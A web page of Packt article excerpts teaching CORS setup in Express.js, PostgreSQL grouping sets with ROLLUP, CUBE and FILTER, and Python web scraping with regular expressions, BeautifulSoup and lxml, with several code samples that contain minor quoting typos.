Connect.js provides middleware to handle Express.js and cookie sessions, to provide parsers for the HTML body and cookies, and to create vhosts (virtual hosts) and error handlers, and to override methods. Backbone.js often uses a Node.js server Backbone.js is a JavaScript framework with a RESTful JSON interface and is based on the model–view–presenter (MVP) application design. It is designed for developing single-page web applications, and for keeping various parts of web applications (for example, multiple clients and the server) synchronized. Backbone depends on Underscore.js, plus jQuery for use of all the available fetures. Backbone often uses a Node.js server, for example to connect to data storage. ReactJS handles user interfaces ReactJS is a JavaScript library for creating user interfaces while addressing challenges encountered in developing single-page applications where data changes over time. React handles the user interface in model–view–controller (MVC) architecture. ReactJS typically runs client-side and can be combined with AngularJS. Although ReactJS was designed to run client-side, it can also be used server-side in conjunction with Node.js. PayPal and Netflix leverage the server-side rendering of ReactJS known as Isomorphic ReactJS. There are React-based add-ons that take care of the server-side parts of a web application. Socket.IO uses WebSockets for realtime event-driven applications Socket.IO is a JavaScript library for event-driven web applications using the WebSocket protocol ,with realtime, bi-directional communication between web clients and servers. It has two parts: a client-side library that runs in the browser, and a server-side library for Node.js. Although it can be used as simply a wrapper for WebSocket, it provides many more features, including broadcasting to multiple sockets, storing data associated with each client, and asynchronous I/O. Socket.IO provides better security than WebSocket alone, since allowed domains must be specified for its server. Ember.js can use Node.js Ember is another popular JavaScript framework with routing that uses Moustache templates. It can run on a Node.js server, or also with Express.js. Ember can also be combined with Rack, a component of Ruby On Rails (ROR). Ember Data is a library for  modeling data in Ember.js applications. CORS in Express.js The following code adds the Access-Control-Allow-Origin and Access-Control-Allow-Headers headers globally to all requests on all routes in an Express.js application. A route is a path in the Express.js application, for example /user for a user page. app.all sets the configuration for all routes in the application. Specific HTTP requests such as GET or POST are handled by app.get and app.post. app.all('*', function(req, res, next) { res.header("Access-Control-Allow-Origin", "*"); res.header("Access-Control-Allow-Headers", "X-Requested-With"); next(); }); app.get('/', function(req, res, next) { // Handle GET for this route }); app.post('/', function(req, res, next) { // Handle the POST for this route }); For better security, consider limiting the allowed origin to a single domain, or adding some additional code to validate or limit the domain(s) that are allowed. Also, consider limiting sending the headers only for routes that require CORS by replacing app.all with a more specific route and method. The following code only sends the CORS headers on a GET request on the route/user, and only allows the request from http://www.localdomain.com. app.get('/user', function(req, res, next) { res.header("Access-Control-Allow-Origin", "http://www.localdomain.com"); res.header("Access-Control-Allow-Headers", "X-Requested-With"); next(); }); Since this is JavaScript code, you may dynamically manage the values of routes, methods, and domains via variables, instead of hard-coding the values. CORS npm for Express.js using Connect.js middleware Connect.js provides middleware to handle requests in Express.js. You can use Node Package Manager (npm) to install a package that enables CORS in Express.js with Connect.js: npm install cors The package offers flexible options, which should be familiar from the CORS specification, including using credentials and preflight. It provides dynamic ways to validate an origin domain using a function or a regular expression, and handler functions to process preflight. Configuration options for CORS npm origin: Configures the Access-Control-Allow-Origin CORS header with a string containing the full URL and protocol making the request, for example http://localdomain.com. Possible values for origin: Default value TRUE uses req.header('Origin') to determine the origin and CORS is enabled. When set to FALSE CORS is disabled. It can be set to a function with the request origin as the first parameter and a callback function as the second parameter. It can be a regular expression, for example /localdomain.com$/, or an array of regular expressions and/or strings to match. methods: Sets the Access-Control-Allow-Methods CORS header. Possible values for methods: A comma-delimited string of HTTP methods, for example GET, POST An array of HTTP methods, for example ['GET', 'PUT', 'POST'] allowedHeaders: Sets the Access-Control-Allow-Headers CORS header. Possible values for allowedHeaders: A comma-delimited string of  allowed headers, for example "Content-Type, Authorization'' An array of allowed headers, for example ['Content-Type', 'Authorization'] If unspecified, it defaults to the value specified in the request's Access-Control-Request-Headers header exposedHeaders: Sets the Access-Control-Expose-Headers header. Possible values for exposedHeaders: A comma-delimited string of exposed headers, for example 'Content-Range, X-Content-Range' An array of exposed headers, for example ['Content-Range', 'X-Content-Range'] If unspecified, no custom headers are exposed credentials: Sets the Access-Control-Allow-Credentials CORS header. Possible values for credentials: TRUE—passes the header for preflight FALSE or unspecified—omit the header, no preflight maxAge: Sets the Access-Control-Allow-Max-Age header. Possible values for maxAge An integer value in milliseconds for TTL to cache the request If unspecified, the request is not cached preflightContinue: Passes the CORS preflight response to the next handler. The default configuration without setting any values allows all origins and methods without preflight. Keep in mind that complex CORS requests other than GET, HEAD, POST will fail without preflight, so make sure you enable preflight in the configuration when using them. Without setting any values, the configuration defaults to: { "origin": "*", "methods": "GET,HEAD,PUT,PATCH,POST,DELETE", "preflightContinue": false } Code examples for CORS npm These examples demonstrate the flexibility of CORS npm for specific configurations. Note that the express and cors packages are always required. Enable CORS globally for all origins and all routes The simplest implementation of CORS npm enables CORS for all origins and all requests. The following example enables CORS for an arbitrary route " /product/:id" for a GET request by telling the entire app to use CORS for all routes: var express = require('express') , cors = require('cors') , app = express(); app.use(cors()); // this tells the app to use CORS for all re-quests and all routes app.get('/product/:id', function(req, res, next){ res.json({msg: 'CORS is enabled for all origins'}); }); app.listen(80, function(){ console.log('CORS is enabled on the web server listening on port 80'); }); Allow CORS for dynamic origins for a specific route The following example uses corsOptions to check if the domain making the request is in the whitelisted array with a callback function, which returns null if it doesn't find a match. This CORS option is passed to the route "product/:id" which is the only route that has CORS enabled. The allowed origins can be dynamic by changing the value of the variable "whitelist." var express = require('express') , cors = require('cors') , app = express(); // define the whitelisted domains and set the CORS options to check them var whitelist = ['http://localdomain.com', 'http://localdomain-other.com']; var corsOptions = { origin: function(origin, callback){ var originWhitelisted = whitelist.indexOf(origin) !== -1; callback(null, originWhitelisted); } }; // add the CORS options to a specific route /product/:id for a GET request app.get('/product/:id', cors(corsOptions), function(req, res, next){ res.json({msg: 'A whitelisted domain matches and CORS is enabled for route product/:id'}); }); // log that CORS is enabled on the server app.listen(80, function(){ console.log(''CORS is enabled on the web server listening on port 80''); }); You may set different CORS options for specific routes, or sets of routes, by defining the options assigned to unique variable names, for example "corsUserOptions." Pass the specific configuration variable to each route that requires that set of options. Enabling CORS preflight CORS requests that use a HTTP method other than GET, HEAD, POST (for example DELETE), or that use custom headers, are considered complex and require a preflight request before proceeding with the CORS requests. Enable preflight by adding an OPTIONS handler for the route: var express = require('express') , cors = require('cors') , app = express(); // add the OPTIONS handler app.options('/products/:id', cors()); // options is added to the route /products/:id // use the OPTIONS handler for the DELETE method on the route /products/:id app.del('/products/:id', cors(), function(req, res, next){ res.json({msg: 'CORS is enabled with preflight on the route '/products/:id' for the DELETE method for all origins!'}); }); app.listen(80, function(){ console.log('CORS is enabled on the web server listening on port 80''); }); You can enable preflight globally on all routes with the wildcard: app.options('*', cors()); Configuring CORS asynchronously One of the reasons to use NodeJS frameworks is to take advantage of their asynchronous abilities, handling multiple tasks at the same time. Here we use a callback function corsDelegateOptions and add it to the cors parameter passed to the route /products/:id. The callback function can handle multiple requests asynchronously. var express = require('express') , cors = require('cors') , app = express(); // define the allowed origins stored in a variable var whitelist = ['http://example1.com', 'http://example2.com']; // create the callback function var corsDelegateOptions = function(req, callback){ var corsOptions; if(whitelist.indexOf(req.header('Origin')) !== -1){ corsOptions = { origin: true }; // the requested origin in the CORS response matches and is allowed }else{ corsOptions = { origin: false }; // the requested origin in the CORS response doesn't match, and CORS is disabled for this request } callback(null, corsOptions); // callback expects two parameters: error and options }; // add the callback function to the cors parameter for the route /products/:id for a GET request app.get('/products/:id', cors(corsDelegateOptions), function(req, res, next){ res.json({msg: ''A whitelisted domain matches and CORS is enabled for route product/:id'}); }); app.listen(80, function(){ console.log('CORS is enabled on the web server listening on port 80''); }); Summary We have learned important stuffs of applying CORS in Node.js. Let us have a qssuick recap of what we have learnt: Node.js provides a web server built with JavaScript, and can be combined with many other JS frameworks as the application server. Although some frameworks have specific syntax for implementing CORS, they all follow the CORS specification by specifying allowed origin(s) and method(s). More robust frameworks allow custom headers such as Content-Type, and preflight when required for complex CORS requests. JavaScript frameworks may depend on the jQuery XHR object, which must be configured properly to allow Cross-Origin requests. JavaScript frameworks are evolving rapidly. The examples here may become outdated. Always refer to the project documentation for up-to-date information. With knowledge of the CORS specification, you may create your own techniques using JavaScript based on these examples, depending on the specific needs of your application. https://en.wikipedia.org/wiki/Node.js  Resources for Article: Further resources on this subject: An Introduction to Node.js Design Patterns [article] Five common questions for .NET/Java developers learning JavaScript and Node.js [article] API with MongoDB and Node.js [article]
Read more
  • 0
  • 0
  • 25710
article-image-grouping-sets-advanced-sql
Packt
20 Jun 2017
6 min read
Save for later

Grouping Sets in Advanced SQL

Packt
20 Jun 2017
6 min read
In this article by Hans JurgenSchonig, the author of the book Mastering PostgreSQL 9.6, we will learn about advanced SQL. Introducing grouping sets Every advanced user of SQL should be familiar with GROUP BY and HAVING clauses. But are you also aware of CUBE, ROLLUP, and GROUPING SETS? If not this articlemight be worth reading for you. Loading some sample data To make this article a pleasant experience for you, I have compiled some sample data, which has been taken from the BP energy report at http://www.bp.com/en/global/corporate/energy-economics/statistical-review-of-world-energy.html. Here is the data structure, which will be used: test=# CREATE TABLE t_oil ( region text, country text, year int, production int, consumption int ); CREATE TABLE The test data can be downloaded from our website using curl directly: test=# COPY t_oil FROM PROGRAM 'curl www.cybertec.at/secret/oil_ext.txt'; COPY 644 On some operating systems curl is not there by default or has not been installed so downloading the file before might be the easier option for many people. All together there is data for 14 nations between 1965 and 2010, which are in two regions of the world: test=# SELECT region, avg(production) FROM t_oil GROUP BY region; region | avg ---------------+--------------------- Middle East | 1992.6036866359447005 North America | 4541.3623188405797101 (2 rows) Applying grouping sets The GROUP BY clause will turn many rows into one row per group. However, if you do reporting in real life, you might also be interested in the overall average. One additional line might be needed. Here is how this can be achieved: test=# SELECT region, avg(production) FROM t_oil GROUP BY ROLLUP (region); region | avg ---------------+----------------------- Middle East | 1992.6036866359447005 North America | 4541.3623188405797101 | 2607.5139860139860140 (3 rows) The ROLLUP clause will inject an additional line, which will contain the overall average. If you do reporting it is highly likely that a summary line will be needed. Instead of running two queries, PostgreSQL can provide the data running just a single query. Of course this kind of operation can also be used if you are grouping by more than just one column: test=# SELECT region, country, avg(production) FROM t_oil WHERE country IN ('USA', 'Canada', 'Iran', 'Oman') GROUP BY ROLLUP (region, country); region | country | avg ---------------+---------+----------------------- Middle East | Iran | 3631.6956521739130435 Middle East | Oman | 586.4545454545454545 Middle East | | 2142.9111111111111111 North America | Canada | 2123.2173913043478261 North America | USA | 9141.3478260869565217 North America | | 5632.2826086956521739 | | 3906.7692307692307692 (7 rows) In this example, PostgreSQL will inject three lines into the result set. One line will be injected for Middle East, one for North America. On top of that we will get a line for the overall averages. If you are building a web application the current result is ideal because you can easily build a GUI to drill into the result set by filtering out the NULL values. The ROLLUPclause is nice in case you instantly want to display a result. I always used it to display final results to end users. However, if you are doing reporting, you might want to pre-calculate more data to ensure more flexibility. The CUBEkeyword is what you might have been looking for: test=# SELECT region, country, avg(production) FROM t_oil WHERE country IN ('USA', 'Canada', 'Iran', 'Oman') GROUP BY CUBE (region, country); region | country | avg ---------------+---------+----------------------- Middle East | Iran | 3631.6956521739130435 Middle East | Oman | 586.4545454545454545 Middle East | | 2142.9111111111111111 North America | Canada | 2123.2173913043478261 North America | USA | 9141.3478260869565217 North America | | 5632.2826086956521739 | | 3906.7692307692307692 | Canada | 2123.2173913043478261 | Iran | 3631.6956521739130435 | Oman | 586.4545454545454545 | USA | 9141.3478260869565217 (11 rows) Note that even more rows have been added to the result. The CUBEwill create the same data as: GROUP BY region, country + GROUP BY region + GROUP BY country + the overall average. So the whole idea is to extract many results and various levels of aggregation at once. The resulting cube contains all possible combinations of groups. The ROLLUP and CUBE are really just convenience features on top of GROUP SETS. With the GROUPING SETS clause you can explicitly list the aggregates you want: test=# SELECT region, country, avg(production) FROM t_oil WHERE country IN ('USA', 'Canada', 'Iran', 'Oman') GROUP BY GROUPING SETS ( (), region, country); region | country | avg ---------------+---------+----------------------- Middle East | | 2142.9111111111111111 North America | | 5632.2826086956521739 | | 3906.7692307692307692 | Canada | 2123.2173913043478261 | Iran | 3631.6956521739130435 | Oman | 586.4545454545454545 | USA | 9141.3478260869565217 (7 rows) In this I went for three grouping sets: The overall average, GROUP BY region and GROUP BY country. In case you want region and country combined, use (region, country). Investigating performance Grouping sets are a powerful feature, which help to reduce the number of expensive queries. Internally,PostgreSQL will basically turn to traditional GroupAggregates to make things work. A GroupAggregate node requires sorted data so be prepared that PostgreSQL might do a lot of temporary sorting: test=# explain SELECT region, country, avg(production) FROM t_oil WHERE country IN ('USA', 'Canada', 'Iran', 'Oman') GROUP BY GROUPING SETS ( (), region, country); QUERY PLAN --------------------------------------------------------------- GroupAggregate (cost=22.58..32.69 rows=34 width=52) Group Key: region Group Key: () Sort Key: country Group Key: country -> Sort (cost=22.58..23.04 rows=184 width=24) Sort Key: region ->Seq Scan on t_oil (cost=0.00..15.66 rows=184 width=24) Filter: (country = ANY ('{USA,Canada,Iran,Oman}'::text[])) (9 rows) Hash aggregates are only supported for normal GROUP BY clauses involving no grouping sets. According to the developer of grouping sets (AtriShama), adding support for hashes is not worth the effort so it seems PostgreSQL already has an efficient implementation even if the optimizer has fewer choices than it has with normal GROUP BY statements. Combining grouping sets with the FILTER clause In real world applications grouping sets can often be combined with so called FILTER clauses. The idea behind FILTER is to be able to run partial aggregates. Here is an example: test=# SELECT region, avg(production) AS all, avg(production) FILTER (WHERE year < 1990) AS old, avg(production) FILTER (WHERE year >= 1990) AS new FROM t_oil GROUP BY ROLLUP (region); region | all | old | new ---------------+----------------+----------------+---------------- Middle East | 1992.603686635 | 1747.325892857 | 2254.233333333 North America | 4541.362318840 | 4471.653333333 | 4624.349206349 | 2607.513986013 | 2430.685618729 | 2801.183150183 (3 rows) The idea here is that not all columns will use the same data for aggregation. The FILTER clauses allow you to selectively pass data to those aggregates. In my example, the second aggregate will only consider data before 1990 while the second aggregate will take care of more recent data. If it is possible to move conditions to a WHERE clause it is always more desirable as less data has to be fetched from the table. The FILTERis only useful if the data left by the WHERE clause is not needed by each aggregate. The FILTER works for all kinds of aggregates and offers a simple way to pivot your data. Summary We have learned about advanced feature provided by SQL. On top of the simple aggregates,PostgreSQL provides, grouping sets to create custom aggregates.  Resources for Article: Further resources on this subject: PostgreSQL in Action [article] PostgreSQL as an Extensible RDBMS [article] Recovery in PostgreSQL 9 [article]
Read more
  • 0
  • 0
  • 2721

article-image-scraping-web-page
Packt
20 Jun 2017
11 min read
Save for later

Scraping a Web Page

Packt
20 Jun 2017
11 min read
In this article by Katharine Jarmul author of the book Python Web Scraping - Second Edition we can look at some example as suppose I have a shop selling shoes and want to keep track of my competitor's prices. I could go to my competitor's website each day and compare each shoe's price with my own, however this will take a lot of time and will not scale well if I sell thousands of shoes or need to check price changes frequently. Or maybe I just want to buy a shoe when it's on sale. I could come back and check the shoe website each day until I get lucky, but the shoe I want might not be on sale for months. These repetitive manual processes could instead be replaced with an automated solution using the web scraping techniques covered in this book. In an ideal world, web scraping wouldn't be necessary and each website would provide an API to share the data in a structured format. Indeed, some websites do provide APIs, but they typically restrict the data that is available and how frequently it can be accessed. Additionally, a website developer might change, remove or restrict the backend API. In short, we cannot rely on APIs to access the online data we may want and therefore, we need to learn about web scraping techniques. (For more resources related to this topic, see here.) Three approaches to scrape a web page Now that we understand the structure of this web page we will investigate three different approaches to scraping its data, first with regular expressions, then with the popular BeautifulSoup module, and finally with the powerful lxml module. Regular expressions If you are unfamiliar with regular expressions or need a reminder, there is a thorough overview available at (https://docs.python.org/3/howto/regex.html). Even if you use regular expressions (or regex) with another programming language, I recommend stepping through it for a refresher on regex with Python. To scrape the country area using regular expressions, we will first try matching the contents of the <td> element, as follows: >>> import re >>> from advanced_link_crawler import download >>> url = 'http://example.webscraping.com/view/UnitedKingdom-239' >>> html = download(url) >>> re.findall(r'(.*?)', html) ['<'img src="/places/static/images/flags/gb.png" />', '244,820 square kilometres', '62,348,447', 'GB', 'United Kingdom', 'London', 'EU', '.uk', 'GBP', 'Pound', '44', '@# #@@|@## #@@|@@# #@@|@@## #@@|@#@ #@@|@@#@ #@@|GIR0AA', '^(([A-Z]\d{2}[A-Z]{2})|([A-Z]\d{3}[A-Z]{2})|([A-Z]{2}\d{2} [A-Z]{2})|([A-Z]{2}\d{3}[A-Z]{2})|([A-Z]\d[A-Z]\d[A-Z]{2}) |([A-Z]{2}\d[A-Z]\d[A-Z]{2})|(GIR0AA))$', 'en-GB,cy-GB,gd', 'IE '] This result shows that thetag is used for multiple country attributes. If we simply wanted to scrape the country area, we can select the second matching element, as follows: >>> re.findall('(.*?)', html)[1]'244,820 square kilometres' This solution works but could easily fail if the web page is updated. Consider if this table is changed and the area is no longer in the second matching element. If we just need to scrape the data now, future changes can be ignored. However, if we want to rescrape this data at some point, we want our solution to be as robust against layout changes as possible. To make this regular expression more specific, we can include the parentelement, which has an ID, so it ought to be unique: >>> re.findall(' Area: (.*?) ', html) ['244,820 square kilometres'] This iteration is better; however, there are many other ways the web page could be updated in a way that still breaks the regular expression. For example, double quotation marks might be changed to single, extra spaces could be added between the tags, or the area_label could be changed. Here is an improved version to try and support these various possibilities: >>> re.findall('''.*?<tds*class=["']w2p_fw["']>(.*?) ''', html) ['244,820 square kilometres'] This regular expression is more future-proof but is difficult to construct, and quite unreadable. Also, there are still plenty of other minor layout changes that would break it, such as if a title attribute was added to the <td> tag or if the tr or td elements changed their CSS classes or IDs. From this example, it is clear that regular expressions provide a quick way to scrape data but are too brittle and easily break when a web page is updated. Fortunately, there are better data extraction solutions such as. Beautiful Soup Beautiful Soup is a popular library that parses a web page and provides a convenient interface to navigate content. If you do not already have this module, the latest version can be installed using this command: pip install beautifulsoup4 The first step with Beautiful Soup is to parse the downloaded HTML into a soup document. Many web pages do not contain perfectly valid HTML and Beautiful Soup needs to correct improper open and close tags. For example, consider this simple web page containing a list with missing attribute quotes and closing tags: <ul class=country> <li>Area <li>Population </ul> If the Population item is interpreted as a child of the Area item instead of the list, we could get unexpected results when scraping. Let us see how Beautiful Soup handles this: >>> from bs4 import BeautifulSoup >>> broken_html = '<ul class=country><li>Area<li>Population</ul>' >>> # parse the HTML >>> soup = BeautifulSoup(broken_html, 'html.parser') >>> fixed_html = soup.prettify() >>> print(fixed_html) <ul class="country"> <li> Area <li> Population </li> </li> </ul> We can see that using the default html.parser did not result in properly parsed HTML. We can see from the previous snippet that it has used nested li elements, which might make it difficult to navigate. Luckily there are more options for parsers. We can install LXML or we can also use html5lib. To install html5lib, simply use pip: pip install html5lib Now, we can repeat this code, changing only the parser like so: >>> soup = BeautifulSoup(broken_html, 'html5lib') >>> fixed_html = soup.prettify() >>> print(fixed_html) <html> <head> </head> <body> <ul class="country"> <li> Area </li> <li> Population </li> </ul> </body> </html>  Here, BeautifulSoup using html5lib was able to correctly interpret the missing attribute quotes and closing tags, as well as add the <html> and <body> tags to form a complete HTML document. You should see similar results if you used lxml. Now, we can navigate to the elements we want using the find() and find_all() methods: >>> ul = soup.find('ul', attrs={'class':'country'}) >>> ul.find('li') # returns just the first match <li>Area</li> >>> ul.find_all('li') # returns all matches [<li>Area</li>, <li>Population</li>] For a full list of available methods and parameters, the official documentation is available at http://www.crummy.com/software/BeautifulSoup/bs4/doc/. Now, using these techniques, here is a full example to extract the country area from our example website: >>> from bs4 import BeautifulSoup >>> url = 'http://example.webscraping.com/places/view/United-Kingdom-239' >>> html = download(url) >>> soup = BeautifulSoup(html) >>> # locate the area row >>> tr = soup.find(attrs={'id':'places_area__row'}) >>> td = tr.find(attrs={'class':'w2p_fw'}) # locate the data element >>> area = td.text # extract the text from the data element >>> print(area) 244,820 square kilometres This code is more verbose than regular expressions but easier to construct and understand. Also, we no longer need to worry about problems in minor layout changes, such as extra whitespace or tag attributes. We also know if the page contains broken HTML that BeautifulSoup can help clean the page and allow us to extract data from very broken website code. Lxml Lxml is a Python library built on top of the libxml2 XML parsing library written in C, which helps make it faster than Beautiful Soup but also harder to install on some computers, specifically Windows. The latest installation instructions are available at http://lxml.de/installation.html. If you run into difficulties installing the library on your own, you can also use Anaconda to do so:  https://anaconda.org/anaconda/lxml. If you are unfamiliar with Anaconda, it is a package and environment manager primarily focused on open data science packages built by the folks at Continuum Analytics. You can download and install Anaconda by following their setup instructions here: https://www.continuum.io/downloads. Note that using the Anaconda quick install will set your PYTHON_PATH to the Conda installation of Python. As with Beautiful Soup, the first step when using lxml is parsing the potentially invalid HTML into a consistent format. Here is an example of parsing the same broken HTML: >>> from lxml.html import fromstring, tostring >>> broken_html = '<ul class=country><li>Area<li>Population</ul>' >>> tree = fromstring(broken_html) # parse the HTML >>> fixed_html = tostring(tree, pretty_print=True) >>> print(fixed_html) <ul class="country"> <li>Area</li> <li>Population</li> </ul> As with BeautifulSoup, lxml was able to correctly parse the missing attribute quotes and closing tags, although it did not add the <html> and <body> tags. These are not requirements for standard XML and so are unnecessary for lxml to insert. After parsing the input, lxml has a number of different options to select elements, such as XPath selectors and a find() method similar to Beautiful Soup. Instead, we will use CSS selectors here, because they are more compact and can be reused later when parsing dynamic content. Some readers will already be familiar with them from their experience with jQuery selectors or use in front-end web application development. We will compare performance of these selectors with XPath. To use CSS selectors, you might need to install the cssselect library like so: pip install cssselect Now we can use the lxml CSS selectors to extract the area data from the example page: >>> tree = fromstring(html) >>> td = tree.cssselect('tr#places_area__row > td.w2p_fw')[0] >>> area = td.text_content() >>> print(area) 244,820 square kilometres By using the cssselect method on our tree, we can utilize CSS syntax to select a table row element with the places_area__row ID, and then the child table data tag with the w2p_fw class. Since cssselect returns a list, we then index the first result and call the text_content method, which will iterate over all child elements and return concatenated text of each element. In this case, we only have one element, but this functionality is useful to know for more complex extraction examples. Summary We have walked through a variety of ways to scrape data from a web page. Regular expressions can be useful for a one-off scrape or to avoid the overhead of parsing the entire web page, and BeautifulSoup provides a high-level interface while avoiding any difficult dependencies. However, in general, lxml will be the best choice because of its speed and extensive functionality, so we will use it in future examples. Resources for Article: Further resources on this subject: Web scraping with Python (Part 2) [article] Scraping the Web with Python - Quick Start [article] Scraping the Data [article]
Read more
  • 0
  • 0
  • 2431
Modal Close icon
Modal Close icon